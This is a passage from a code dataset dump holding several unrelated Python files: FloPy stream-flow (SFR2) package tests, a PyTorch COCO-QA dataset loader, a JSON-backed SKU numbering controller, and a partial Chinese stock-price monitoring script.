sfr.channel_geometry_data[0][1] == [\n [0.0, 2.0, 4.0, 6.0, 8.0, 10.0, 12.0, 14.0],\n [6.0, 4.5, 3.5, 0.0, 0.3, 3.5, 4.5, 6.0]]\n\n m, sfr = sfr_process('testsfr2.nam', 'testsfr2.sfr', path)\n\n assert round(sum(sfr.segment_data[49][0]), 7) == 3.9700007\n\n m, sfr = sfr_process('UZFtest2.nam', 'UZFtest2.sfr', path)\n\n if matplotlib is not None:\n assert isinstance(sfr.plot()[0],\n matplotlib.axes.Axes) # test the plot() method\n\n # trout lake example (only sfr file is included)\n # can add tests for sfr connection with lak package\n m, sfr = load_sfr_only(os.path.join(path2, 'TL2009.sfr'))\n # convert sfr package to reach input\n sfr.reachinput = True\n sfr.isfropt = 1\n sfr.reach_data = interpolate_to_reaches(sfr)\n sfr.get_slopes(minimum_slope=-100, maximum_slope=100)\n reach_inds = 29\n outreach = sfr.reach_data.outreach[reach_inds]\n out_inds = np.where(sfr.reach_data.reachID == outreach)\n assert sfr.reach_data.slope[reach_inds] == (sfr.reach_data.strtop[reach_inds] -\n sfr.reach_data.strtop[out_inds]) \\\n / sfr.reach_data.rchlen[reach_inds]\n chk = sfr.check()\n assert sfr.reach_data.slope.min() < 0.0001 and 'minimum slope' in chk.warnings\n sfr.reach_data.slope[0] = 1.1\n chk.slope(maximum_slope=1.0)\n assert 'maximum slope' in chk.warnings\n\n\ndef test_sfr_renumbering():\n # test segment renumbering\n\n dtype = np.dtype([('iseg', int), ('ireach', int)])\n r = create_empty_recarray(27, dtype)\n r['iseg'] = sorted(list(range(1, 10)) * 3)\n r['ireach'] = [1, 2, 3] * 9\n\n dtype = np.dtype([('nseg', int), ('outseg', int)])\n d = create_empty_recarray(9, dtype)\n d['nseg'] = range(1, 10)\n d['outseg'] = [4, 0, 6, 8, 3, 8, 1, 2, 8]\n m = flopy.modflow.Modflow()\n sfr = 
flopy.modflow.ModflowSfr2(m, reach_data=r, segment_data={0: d})\n chk = sfr.check()\n assert 'segment numbering order' in chk.warnings\n sfr.renumber_segments()\n chk = sfr.check()\n assert 'continuity in segment and reach numbering' in chk.passed\n assert 'segment numbering order' in chk.passed\n\n # test renumbering non-consecutive segment numbers\n r['iseg'] *= 2\n r['ireach'] = [1, 2, 3] * 9\n\n dtype = np.dtype([('nseg', int), ('outseg', int)])\n d = create_empty_recarray(9, dtype)\n d['nseg'] = np.arange(1, 10) * 2\n d['outseg'] = np.array([4, 0, 6, 8, 3, 8, 1, 2, 8]) * 2\n m = flopy.modflow.Modflow()\n sfr = flopy.modflow.ModflowSfr2(m, reach_data=r, segment_data={0: d})\n chk = sfr.check()\n assert 'segment numbering order' in chk.warnings\n sfr.renumber_segments()\n chk = sfr.check()\n assert 'continuity in segment and reach numbering' in chk.passed\n assert 'segment numbering order' in chk.passed\n\n # test computing of outreaches\n assert np.array_equal(sfr.reach_data.outreach,\n np.array([2, 3, 7,\n 5, 6, 10,\n 8, 9, 16,\n 11, 12, 19,\n 14, 15, 22,\n 17, 18, 22,\n 20, 21, 22,\n 23, 24, 25,\n 26, 27, 0]))\n # test slope\n sfr.reach_data['rchlen'] = [10] * 3 * 5 + [100] * 2 * 3 + [1] * 2 * 3\n strtop = np.zeros(len(sfr.reach_data))\n strtop[2] = .3\n strtop[21] = -.2\n strtop[22] = -.4\n sfr.reach_data['strtop'] = strtop\n default_slope = .0001\n sfr.get_slopes(default_slope=default_slope)\n sl1 = sfr.reach_data.slope[2]\n def isequal(v1, v2):\n return np.abs(v1-v2) < 1e-6\n assert isequal(sfr.reach_data.slope[2], 0.03)\n assert isequal(sfr.reach_data.slope[14], 0.02)\n assert isequal(sfr.reach_data.slope[20], sfr.reach_data.slope[17])\n assert isequal(sfr.reach_data.slope[21], 0.2)\n assert isequal(sfr.reach_data.slope[-1], default_slope)\n\ndef test_const():\n\n fm = flopy.modflow\n m = fm.Modflow()\n dis = fm.ModflowDis(m, 1, 10, 10, lenuni=2, itmuni=4)\n m.modelgrid = StructuredGrid(delc=dis.delc.array,\n delr=dis.delr.array,)\n r, d = create_sfr_data()\n sfr = flopy.modflow.ModflowSfr2(m, reach_data=r, segment_data={0: d})\n assert sfr.const == 86400.\n m.dis.itmuni = 1.\n m.sfr.const = None\n assert sfr.const == 1.\n m.dis.lenuni = 1.\n m.sfr.const = None\n assert sfr.const == 1.486\n m.dis.itmuni = 4.\n m.sfr.const = None\n assert sfr.const == 1.486 * 86400.\n assert True\n\ndef test_export():\n fm = flopy.modflow\n m = fm.Modflow()\n dis = fm.ModflowDis(m, 1, 10, 10, lenuni=2, itmuni=4)\n sr = SpatialReference(xul=0.0, yul=0.0, delc=m.dis.delc.array)\n m.modelgrid = StructuredGrid(delc=m.dis.delc.array,\n delr=m.dis.delr.array,\n xoff=sr.xll, yoff=sr.yll)\n # m.sr.origin_loc = \"ll\"\n m.export(os.path.join(outpath, 'grid.shp'))\n r, d = create_sfr_data()\n sfr = flopy.modflow.ModflowSfr2(m, reach_data=r, segment_data={0: d})\n sfr.segment_data[0]['flow'][-1] = 1e4\n sfr.stress_period_data.export(os.path.join(outpath, 'sfr.shp'), sparse=True)\n sfr.export_linkages(os.path.join(outpath, 'linkages.shp'))\n sfr.export_outlets(os.path.join(outpath, 'outlets.shp'))\n sfr.export_transient_variable(os.path.join(outpath, 'inlets.shp'),\n 'flow')\n\n from flopy.export.shapefile_utils import shp2recarray\n ra = shp2recarray(os.path.join(outpath, 'inlets.shp'))\n assert ra.flow0[0] == 1e4\n ra = shp2recarray(os.path.join(outpath, 'outlets.shp'))\n assert ra.iseg[0] + ra.ireach[0] == 5\n ra = shp2recarray(os.path.join(outpath, 'linkages.shp'))\n crds = np.array(list(ra.geometry[2].coords))\n assert np.array_equal(crds, np.array([[2.5, 4.5], [3.5, 5.5]]))\n ra = 
shp2recarray(os.path.join(outpath, 'sfr.shp'))\n assert ra.iseg0.sum() == sfr.reach_data.iseg.sum()\n assert ra.ireach0.sum() == sfr.reach_data.ireach.sum()\n y = np.concatenate([np.array(g.exterior)[:, 1] for g in ra.geometry])\n x = np.concatenate([np.array(g.exterior)[:, 0] for g in ra.geometry])\n\n assert (x.min(), x.max(), y.min(), y.max()) == m.modelgrid.extent\n assert ra[(ra.iseg0 == 2) & (ra.ireach0 == 1)]['geometry'][0].bounds \\\n == (6.0, 2.0, 7.0, 3.0)\n\ndef test_example():\n m = flopy.modflow.Modflow.load('test1ss.nam', version='mf2005',\n exe_name='mf2005',\n model_ws=path,\n load_only=['ghb', 'evt', 'rch', 'dis',\n 'bas6', 'oc', 'sip', 'lpf'])\n reach_data = np.genfromtxt(\n '../examples/data/sfr_examples/test1ss_reach_data.csv', delimiter=',',\n names=True)\n segment_data = np.genfromtxt(\n '../examples/data/sfr_examples/test1ss_segment_data.csv',\n delimiter=',', names=True)\n # segment_data = {0: ss_segment_data}\n\n channel_flow_data = {\n 0: {1: [[0.5, 1.0, 2.0, 4.0, 7.0, 10.0, 20.0, 30.0, 50.0, 75.0, 100.0],\n [0.25, 0.4, 0.55, 0.7, 0.8, 0.9, 1.1, 1.25, 1.4, 1.7, 2.6],\n [3.0, 3.5, 4.2, 5.3, 7.0, 8.5, 12.0, 14.0, 17.0, 20.0, 22.0]]}}\n channel_geometry_data = {\n 0: {7: [[0.0, 10.0, 80.0, 100.0, 150.0, 170.0, 240.0, 250.0],\n [20.0, 13.0, 10.0, 2.0, 0.0, 10.0, 13.0, 20.0]],\n 8: [[0.0, 10.0, 80.0, 100.0, 150.0, 170.0, 240.0, 250.0],\n [25.0, 17.0, 13.0, 4.0, 0.0, 10.0, 16.0, 20.0]]}}\n\n nstrm = len(reach_data) # number of reaches\n nss = len(segment_data) # number of segments\n nsfrpar = 0 # number of parameters (not supported)\n nparseg = 0\n const = 1.486 # constant for manning's equation, units of cfs\n dleak = 0.0001 # closure tolerance for stream stage computation\n ipakcb = 53 # flag for writing SFR output to cell-by-cell budget (on unit 53)\n istcb2 = 81 # flag for writing SFR output to text file\n dataset_5 = {0: [nss, 0, 0]} # dataset 5 (see online guide)\n\n sfr = flopy.modflow.ModflowSfr2(m, nstrm=nstrm, nss=nss, const=const,\n dleak=dleak, ipakcb=ipakcb, istcb2=istcb2,\n reach_data=reach_data,\n segment_data=segment_data,\n channel_geometry_data=channel_geometry_data,\n channel_flow_data=channel_flow_data,\n dataset_5=dataset_5)\n\n #assert istcb2 in m.package_units\n assert istcb2 in m.output_units\n assert True\n\n # test handling of a 0-D array (produced by genfromtxt sometimes)\n segment_data = np.array(segment_data[0])\n reach_data = reach_data[reach_data['iseg'] == 1]\n nss = 1\n sfr = flopy.modflow.ModflowSfr2(m, nstrm=nstrm, nss=nss, const=const,\n dleak=dleak, ipakcb=ipakcb, istcb2=istcb2,\n reach_data=reach_data,\n segment_data=segment_data,\n channel_geometry_data=channel_geometry_data,\n channel_flow_data=channel_flow_data,\n dataset_5=dataset_5)\n\n # test default construction of dataset_5\n sfr2 = flopy.modflow.ModflowSfr2(m, nstrm=nstrm, nss=nss, const=const,\n dleak=dleak, ipakcb=ipakcb, istcb2=istcb2,\n reach_data=reach_data,\n segment_data=segment_data,\n channel_geometry_data=channel_geometry_data,\n channel_flow_data=channel_flow_data)\n assert len(sfr2.dataset_5) == 1\n assert sfr2.dataset_5[0][0] == sfr2.nss\n nper = 9\n m.dis.nper = nper\n assert len(sfr2.dataset_5) == nper\n for i in range(1, nper):\n assert sfr2.dataset_5[i][0] == -1\n\ndef test_ds_6d_6e_disordered():\n path = os.path.join(\"..\", \"examples\", \"data\", \"hydmod_test\")\n path2 = os.path.join(\".\", \"temp\", \"t009\")\n m = flopy.modflow.Modflow.load(\"test1tr2.nam\",\n model_ws=path)\n\n m.change_model_ws(path2)\n m.write_input()\n\n m2 = 
flopy.modflow.Modflow.load(\"test1tr2.nam\",\n model_ws=path2)\n\n sfr = m.get_package(\"SFR\")\n sfr2 = m2.get_package(\"SFR\")\n\n\n if len(sfr.all_segments) != len(sfr2.all_segments):\n raise AssertionError\n\n if len(sfr.segment_data[0]) != len(sfr2.segment_data[0]):\n raise AssertionError\n\n for kper, d in sfr.channel_flow_data.items():\n for seg, value in d.items():\n if not np.allclose(value, sfr2.channel_flow_data[kper][seg]):\n raise AssertionError\n\n for kper, d in sfr.channel_geometry_data.items():\n for seg, value in d.items():\n if not np.allclose(value, sfr2.channel_geometry_data[kper][seg]):\n raise AssertionError\n\n\ndef test_transient_example():\n path = os.path.join('temp', 't009')\n gpth = os.path.join('..', 'examples', 'data', 'mf2005_test', 'testsfr2.*')\n for f in glob.glob(gpth):\n shutil.copy(f, path)\n mf = flopy.modflow\n m = mf.Modflow.load('testsfr2.nam', model_ws=path)\n\n # test handling of unformatted output file\n m.sfr.istcb2 = -49\n m.set_output_attribute(unit=abs(m.sfr.istcb2), attr={'binflag':True})\n m.write_input()\n m2 = mf.Modflow.load('testsfr2.nam', model_ws=path)\n assert m2.sfr.istcb2 == -49\n assert m2.get_output_attribute(unit=abs(m2.sfr.istcb2), attr='binflag')\n\ndef test_assign_layers():\n m = fm.Modflow()\n m.dis = fm.ModflowDis(nrow=1, ncol=6, nlay=7,\n botm=np.array([[ 50., 49., 42., 27., 6., -33.],\n [ -196., -246., -297., -351., -405., -462.],\n [ -817., -881., -951., -1032., -1141., -1278.],\n [-1305., -1387., -1466., -1546., -1629., -1720.],\n [-2882., -2965., -3032., -3121., -3226., -3341.],\n [-3273., -3368., -3451., -3528., -3598., -3670.],\n [-3962., -4080., -4188., -4292., -4392., -4496.]]),\n model=m)\n reach_data = fm.ModflowSfr2.get_empty_reach_data(5)\n seg_data = {0: fm.ModflowSfr2.get_empty_segment_data(1)}\n seg_data[0]['outseg'] = 0\n reach_data['k'] = 0\n reach_data['i'] = 0\n reach_data['j'] = np.arange(5)\n reach_data['strtop'] = np.array([20, -250, 0., -3000., -4500.])\n reach_data['strthick'] = 1.\n sfr = fm.ModflowSfr2(reach_data=reach_data,\n segment_data=seg_data,\n model=m)\n sfr.assign_layers()\n assert np.array_equal(sfr.reach_data.k, np.array([1, 2, 1, 4, 6]))\n\n l = m.dis.get_layer(0, 0, 0.)\n assert l == 1\n l = m.dis.get_layer(0, [0, 1], 0.)\n assert np.array_equal(l, np.array([1, 1]))\n\n\ndef test_SfrFile():\n sfrout = SfrFile('../examples/data/sfr_examples/sfroutput2.txt')\n # will be None if pandas is not installed\n if sfrout.pd is not None:\n df = sfrout.get_dataframe()\n assert df.layer.values[0] == 1\n assert df.column.values[0] == 169\n assert df.Cond.values[0] == 74510.0\n assert df.col18.values[3] == 1.288E+03\n\n sfrout = SfrFile('../examples/data/sfr_examples/test1tr.flw')\n if sfrout.pd is not None:\n df = sfrout.get_dataframe()\n assert df.col16.values[-1] == 5.502E-02\n assert df.shape == (1080, 20)\n\n\ndef test_sfr_plot():\n #m = flopy.modflow.Modflow.load('test1ss.nam', model_ws=path, verbose=False)\n #sfr = m.get_package('SFR')\n #sfr.plot(key='strtop')\n #plt.show()\n #assert True\n pass\n\nif __name__ == '__main__':\n # test_sfr()\n # test_ds_6d_6e_disordered()\n # test_sfr_renumbering()\n # test_example()\n # test_export()\n #test_transient_example()\n #test_sfr_plot()\n # test_assign_layers()\n # test_SfrFile()\n # test_const()\n pass\n","sub_path":"autotest/t009_test.py","file_name":"t009_test.py","file_ext":"py","file_size_in_byte":19372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"299766062","text":"import os\nimport 
torch\nimport numpy as np\nimport torch.nn as nn\nimport torchvision.transforms as transforms\n\nfrom PIL import Image\nfrom six.moves import cPickle as pickle\nfrom torch.utils.data import Dataset\nfrom external.vqa.vqa import VQA\nfrom coatt.dataset import pre_process_dataset\n\ndef pil_loader(path):\n # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n img = img.convert('RGB')\n return img\n\n\ndef default_loader(path):\n from torchvision import get_image_backend\n if get_image_backend() == 'accimage':\n return accimage_loader(path)\n else:\n return pil_loader(path)\n\nclass CocoQAXDataset(Dataset):\n def __init__(self,\n image_enc_dir,\n image_names,\n question_id_file,\n answer_text_file,\n img_prefix,\n collate=False,\n enc_idx=None,\n q2i=None,\n a2i=None,\n i2a=None):\n\n self.image_enc_dir = image_enc_dir\n self.image_names = image_names\n self.ques_ids = np.load(question_id_file, allow_pickle=True)\n self.answers = [s.strip() for s in open(answer_text_file, \"r\").readlines()]\n self.enc_idx = enc_idx\n self.q2i = q2i\n self.a2i = a2i\n self.i2a = i2a\n self.collate = collate\n\n self.q2i_len = len(self.q2i)\n self.a2i_len = len(self.a2i.keys())\n self.q2i_keys = self.q2i.keys()\n\n self.img_ids = []\n for fname in self.image_names:\n img_id = fname.split('.')[0].rpartition(img_prefix)[-1]\n self.img_ids.append(int(img_id))\n\n def __len__(self):\n return len(self.ques_ids)\n\n def __getitem__(self, idx):\n\n img_id = self.img_ids[idx]\n file_idx = self.enc_idx[img_id]\n path = self.image_enc_dir + '/' + str(file_idx) + '.npz'\n img = np.load(path)['out'] # 512 x 196\n imgT = torch.from_numpy(img).float()\n\n ques_id = self.ques_ids[idx]\n quesT = torch.from_numpy(np.array(ques_id)).long()\n answer = self.answers[idx]\n\n if answer == \"\":\n gT = torch.from_numpy(np.array([len(self.a2i)])).long()\n else:\n gT = torch.from_numpy(np.array([self.a2i[answer]])).long()\n\n if not self.collate:\n return {'img' : imgT, 'ques' : quesT, 'gt': gT}\n\n return imgT, quesT, gT\n\n\nclass CocoQADataset(Dataset):\n\n def __init__(self,\n image_dir,\n question_id_file,\n image_names,\n answer_text_file,\n collate=False,\n q2i=None,\n a2i=None,\n i2a=None,\n method=\"simple\"):\n \"\"\"\n Args:\n image_dir (string): Path to the directory with COCO images\n question_id_file (string): Path to the npy file containing the question id array\n image_names_file (string): Path to the npy file containing image name array\n answer_text_file (string): Path to the text file containing answertext\n\n \"\"\"\n\n print(method)\n self.image_dir = image_dir\n self.ques_ids = np.load(question_id_file, allow_pickle=True)\n #self.image_names = np.load(image_names_file, allow_pickle=True)\n self.image_names = image_names\n self.answers = [s.strip() for s in open(answer_text_file, \"r\").readlines()]\n self.q2i = q2i\n self.a2i = a2i\n self.i2a = i2a\n self.method = method\n self.collate = collate\n\n self.transform = transforms.Compose([transforms.Resize((224, 224)),\n transforms.ToTensor()])\n\n self.q2i_len = len(self.q2i)\n self.a2i_len = len(self.a2i.keys())\n self.q2i_keys = self.q2i.keys()\n\n\n def __len__(self):\n return len(self.ques_ids)\n\n def __getitem__(self, idx):\n img = default_loader(self.image_dir + '/' + self.image_names[idx])\n #imgT = self.transform(img).permute(1, 2, 0)\n imgT = self.transform(img).float()\n\n ques_id = self.ques_ids[idx]\n quesT = torch.from_numpy(np.array(ques_id)).long()\n 
answer = self.answers[idx]\n\n if answer == \"\":\n gT = torch.from_numpy(np.array([len(self.a2i)])).long()\n else:\n gT = torch.from_numpy(np.array([self.a2i[answer]])).long()\n\n if not self.collate:\n return {'img' : imgT, 'ques' : quesT, 'gt': gT}\n\n return imgT, quesT, gT\n","sub_path":"coatt/cocoqa_dataset.py","file_name":"cocoqa_dataset.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"648420987","text":"import json\n\ncaminho = 'C:/Users/matheus.bertho/Desktop/Filosofo Piton/AutParts/GeradorDeAnuncios/skuControl/datas/' \\\n 'jsonSAP.json'\n\n\nclass SkuSimpleController:\n # pedir para entrar com caminho para o json\n def __init__(self, test=False):\n self._test = test\n self._caminho = caminho if test else caminho\n self._dicionarioJson = self.__openJson()\n\n def getDicionario(self):\n return self._dicionarioJson\n\n def getIdList(self):\n listID = []\n for x in self._dicionarioJson:\n listID.append(x['id'])\n return listID\n\n def __openJson(self):\n try:\n config = json.loads(open(self._caminho, encoding=\"utf8\").read())\n except FileNotFoundError:\n exit(\"Arquivo \" + self._caminho + \" Não encontrado\")\n return config\n\n def setJsonPlusOne(self, sap):\n for di in self._dicionarioJson:\n if di['id'] == sap:\n di['data']['value'] += 1\n\n with open(self._caminho, \"w\", encoding='utf8') as jsonFile:\n json.dump(self._dicionarioJson, jsonFile, ensure_ascii=False)\n\n def getName(self, sku):\n\n with open(self._caminho, \"r\", encoding='utf-8') as lerJson:\n arqJsonLeitura = json.load(lerJson)\n\n sap = sku.split('-')[0]\n for itemJson in arqJsonLeitura:\n \"\"\"\n caso identificar que tem algum ja criado adicionar outro\n \"\"\"\n if sap == itemJson['id']:\n return itemJson['data']['category_name']\n exit('produto nao encontrado getName')\n\n def createNewSkuSimple(self, sap, marca='', nome='', qnt=0):\n\n sapTratado = self.validateSap(sap)\n\n with open(self._caminho, \"r\", encoding='utf-8') as lerJson:\n arqJsonLeitura = json.load(lerJson)\n self.getListaComIds(arqJsonLeitura)\n\n for itemJson in arqJsonLeitura:\n \"\"\"\n caso identificar que tem algum ja criado adicionar outro\n \"\"\"\n if sapTratado == itemJson['id']:\n # verificar se vai parar aqui mesmo\n # exit(f'duplicado? 
{itemJson[\"id\"]}')\n if self._test:\n return self.SKU(sapTratado, str(itemJson[\"data\"][\"value\"] + 1))\n else:\n self.setJsonPlusOne(itemJson['id'])\n return str(self.SKU(sapTratado, itemJson['data']['value'])) # adiciona um no value\n\n campoSap = self.createNewDataSap(marca, nome, qty_package=qnt)\n\n novoSku = {\n \"id\": sapTratado,\n \"data\": campoSap\n }\n self._dicionarioJson.append(novoSku)\n\n with open(self._caminho, \"w\", encoding='utf8') as jsonFile:\n json.dump(self._dicionarioJson, jsonFile, indent=4, ensure_ascii=False)\n\n sku = self.SKU(sapTratado, campoSap['value'])\n\n return sku\n\n def getListaComIds(self, arqJsonLeitura):\n listaIds = []\n for eachJsonFileSimple in arqJsonLeitura:\n listaIds.append(eachJsonFileSimple['id'])\n\n def SKU(self, sapTratado, value):\n return str(sapTratado) + '-' + str((4 - len(str(value))) * '0') + str(value)\n\n def validateSap(self, sap):\n sapTratado = sap.upper().replace(' ', '')\n if len(sapTratado) != 7 or 'AU' not in sapTratado:\n exit(f\"Nome do SAP {sap} não permitido\")\n return sapTratado\n\n def createNewDataSap(self, marca, nome, qty_package=1):\n return {'value': 0, \"category_name\": nome, \"qty_package\": qty_package, \"brand\": marca}\n\n\n# j = SkuSimpleController()\n# j.createNewSkuSimple('aucb003', \"Bosch\")\n","sub_path":"ControleSapSku/bkp_temporario/SkuSimpleController.py","file_name":"SkuSimpleController.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"53906384","text":"#!/usr/bin/env python\nimport easyquotation\nimport time\nimport easyutils\nimport yarl\nimport sys\n\nfrom stock_get_history_data import *\n\nfrom statistics import mean\n\nfrom send_email import send_email\n\nDEBUG = True\ndef send_info(*args):\n if(DEBUG):\n print(*args)\n else :\n send_email(*args)\n\nMONITOR_POTENTIAL = False\n\nclass stock_monitor(stock_history_data) :\n def __init__(self, info_src, watch_stocks_dict):\n \n self.stock_list = []\n self.quotation = easyquotation.use(info_src) # 新浪 ['sina'] 腾讯 ['tencent', 'qq'] \n self.watch_stocks_info = watch_stocks_dict.copy()\n self.watch_stocks_list = [ key for key in watch_stocks_dict]\n \n ###############\n self.stock_dict,self.stock_list,self.stock_prefix_list = get_stock_code_name()\n# self.stock_list.remove('150129')\n self.already_informed_stocks = []\n\n self.first_time = 1\n self.stock_info_store = {}\n self.surged_limits = {}\n self.decline_limits = {}\n self.deal_time_store = []\n #上证指数 深圳成指 沪深300指数 上证50 中小板 创业板\n #index_list = {'sh': 'sh000001', 'sz': 'sz399001', 'hs300': 'sh000300',\n # 'sz50': 'sh000016', 'zxb': 'sz399005', 'cyb': 'sz399006', 'zx300': 'sz399008', 'zh500':'sh000905'}\n self.index_list = ['sh000001', 'sz399001', 'sh000300', 'sh000016','sz399005','sz399006']\n self.index_data_store = {}\n self.watch_stock_data_store = {}\n\n def print_stock_data(self,stock_data):\n for stock_code in self.stock_list:\n print(stock_data[stock_code])\n def debug_print(self,header , content):\n print(header)\n print(\"------------------------------\")\n print(content)\n\n def check_special_cases(self,stock_data):\n for stock_code in stock_data:\n if( stock_data[stock_code]['ask_all_volume'] == 0.0 and \\\n stock_data[stock_code]['bid_all_volume'] == 0.0) :\n self.debug_print(\"停牌 !从列表移除 \", str(stock_data[stock_code]))\n self.stock_list.remove(stock_code)\n elif( stock_data[stock_code]['close'] == 0) :\n self.debug_print(\"停牌 !从列表移除 \", str(stock_data[stock_code]))\n 
self.stock_list.remove(stock_code)\n\n def preprocess_index_data(self, index_data):\n pass\n def preprocess_watch_stock_data_step2(self, watch_stock_data):\n pass\n\n \n\n def preprocess_stock_index_data(self, stock_data,index_data,\n watch_stock_data):\n self.preprocess_stock_data_step1(stock_data)\n self.check_special_cases(stock_data)\n self.preprocess_stock_data_step2(stock_data)\n self.preprocess_index_data(index_data)\n self.preprocess_watch_stock_data_step1(watch_stock_data)\n self.preprocess_watch_stock_data_step2(watch_stock_data)\n\n\n\n def preprocess_watch_stock_data_step1(self, watch_stock_data):\n for stock_code in watch_stock_data:\n\n watch_stock_data[stock_code]['bid_all_volume'] = \\\n watch_stock_data[stock_code]['bid1_volume'] + \\\n watch_stock_data[stock_code]['bid2_volume'] + \\\n watch_stock_data[stock_code]['bid3_volume'] + \\\n watch_stock_data[stock_code]['bid4_volume'] + \\\n watch_stock_data[stock_code]['bid5_volume'] \n\n watch_stock_data[stock_code]['ask_all_volume'] = \\\n watch_stock_data[stock_code]['ask1_volume'] + \\\n watch_stock_data[stock_code]['ask2_volume'] + \\\n watch_stock_data[stock_code]['ask3_volume'] + \\\n watch_stock_data[stock_code]['ask4_volume'] + \\\n watch_stock_data[stock_code]['ask5_volume'] \n\n# Pay attention, stock_data key may not equal to self.stock_list , because we\n# may failed to fetch some stocks info\n def preprocess_stock_data_step1(self, stock_data):\n for stock_code in stock_data:\n \n stock_data[stock_code]['bid_all_volume'] = \\\n stock_data[stock_code]['bid1_volume'] + \\\n stock_data[stock_code]['bid2_volume'] + \\\n stock_data[stock_code]['bid3_volume'] + \\\n stock_data[stock_code]['bid4_volume'] + \\\n stock_data[stock_code]['bid5_volume'] \n\n stock_data[stock_code]['ask_all_volume'] = \\\n stock_data[stock_code]['ask1_volume'] + \\\n stock_data[stock_code]['ask2_volume'] + \\\n stock_data[stock_code]['ask3_volume'] + \\\n stock_data[stock_code]['ask4_volume'] + \\\n stock_data[stock_code]['ask5_volume'] \n\n def preprocess_stock_data_step2(self, stock_data):\n pass\n '''\n for stock_code in self.stock_list[:]:\n if ( stock_data[stock_code]['close'] == 0) :\n# print(stock_data[stock_code])\n self.stock_list.remove(stock_code)\n '''\n def monitor_stock_price_range(self, stock_data):\n local_stock_in_high_range = {}\n local_stock_in_low_range = {}\n local_stock_in_high_range_and_fluct = {}\n for stock_code in stock_data:\n if((stock_data[stock_code]['now'] >= (0.9*stock_data[stock_code]['high']+\n 0.1*stock_data[stock_code]['low'])) and\n (stock_data[stock_code]['rate'] >= 3)):\n local_stock_in_high_range_and_fluct[stock_code]= \\\n stock_data[stock_code].copy()\n\n if(stock_data[stock_code]['now'] >= \\\n (0.9*stock_data[stock_code]['high']+\n 0.1*stock_data[stock_code]['low'])):\n local_stock_in_high_range[stock_code]= \\\n stock_data[stock_code].copy()\n\n if(stock_data[stock_code]['now'] >= \\\n (0.9*stock_data[stock_code]['low']+\n 0.1*stock_data[stock_code]['high'])):\n local_stock_in_low_range[stock_code]= \\\n stock_data[stock_code].copy()\n\n# for code in local_stock_in_high_range_and_fluct:\n# print('{}:{}'.format(code, local_stock_in_high_range_and_fluct[code]['name']),\\\n# end = ' ')\n\n print('Total in deal stock {}'.format(len(stock_data)))\n print('In high price range stock \\\n {}'.format(len(local_stock_in_high_range)))\n# for code in local_stock_in_high_range:\n# print('{} {}'.format(code,local_stock_in_high_range[code]['name']),\n# end = ' ')\n print('In low price range stock \\\n 
{}'.format(len(local_stock_in_low_range)))\n# for code in local_stock_in_low_range:\n# print('{} {}'.format(code,local_stock_in_low_range[code]['name']),\n# end = ' ')\n\n\n\n def monitor_surged_decline_limits(self, stock_data):\n local_surged_limits = {}\n local_decline_limits = {}\n\n for stock_code in stock_data:\n if (stock_data[stock_code]['ask_all_volume'] == 0) :\n# self.debug_print(\"涨停 !\" ,str(stock_data[stock_code]))\n local_surged_limits[stock_code] = stock_data[stock_code].copy()\n elif (stock_data[stock_code]['bid_all_volume'] == 0) :\n# self.debug_print(\"跌停 !\" ,str(stock_data[stock_code]))\n local_decline_limits[stock_code] = stock_data[stock_code].copy()\n\n print(\"surged limits is as follows \")\n for stock_code in local_surged_limits:\n print('{0} {1} 封单:{2}'.format(stock_code,\n local_surged_limits[stock_code]['name'],\n local_surged_limits[stock_code]['bid1_volume']))\n print('两市涨停 {0} , 两市跌停 {1}'.format(len(local_surged_limits),\n len(local_decline_limits)))\n# print(\"decline limits is as follows \")\n# print(local_decline_limits)\n\n new_surge_stock_codes = [key for key in local_surged_limits if key not\n in self.surged_limits]\n print(\"---------------------------------------\")\n print(\"新涨停股票\")\n for key in new_surge_stock_codes:\n print('{} {}'.format(key, local_surged_limits[key]['name']))\n out_surge_stock_codes = [ key for key in self.surged_limits if key not in\n local_surged_limits ]\n print(\"---------------------------------------\")\n print(\"打开涨停股票\")\n for key in out_surge_stock_codes:\n print('{} {}'.format(key, self.surged_limits[key]['name']))\n\n common_surge_stock_codes = [ key for key in local_surged_limits if key\n in self.surged_limits]\n print(\"---------------------------------------\")\n print(\"封单减少 可能打开涨停\")\n for key in common_surge_stock_codes :\n if( local_surged_limits[key]['bid1_volume'] <=\n self.surged_limits[key]['bid1_volume']*0.95):\n print(\"{0} {1} origin:{2} now:{3}\".format(key,local_surged_limits[key]['name'],self.surged_limits[key]['bid1_volume'],local_surged_limits[key]['bid1_volume']))\n print(\"------------------------------------------\")\n print(\"封单增加 涨停更稳\")\n for key in common_surge_stock_codes :\n if( local_surged_limits[key]['bid1_volume'] >=\n self.surged_limits[key]['bid1_volume']*1.05):\n print(\"{0} {1} origin:{2} now:{3}\".format(key,local_surged_limits[key]['name'],self.surged_limits[key]['bid1_volume'],local_surged_limits[key]['bid1_volume']))\n\n self.surged_limits = local_surged_limits.copy()\n# del self.surged_limits['002225']\n# self.surged_limits['600519'] = stock_data['600519']\n# self.surged_limits['600755']['bid1_volume'] = 30000\n# self.surged_limits['000036']['bid1_volume'] = 30000\n self.decline_limits = local_decline_limits.copy()\n\n\n def monitor_biding_and_fluctuation(self, stock_data):\n for stock_code in stock_data:\n '''\n if(stock_data[stock_code]['rate'] == \\\n self.stock_info_store[stock_code]['rate'] and \\\n stock_data[stock_code]['ask_all_volume'] == \\\n self.stock_info_store[stock_code]['ask_all_volume'] and \\\n stock_data[stock_code]['bid_all_volume'] == \\\n self.stock_info_store[stock_code]['bid_all_volume'] ):\n self.debug_print(\"收市状态? 
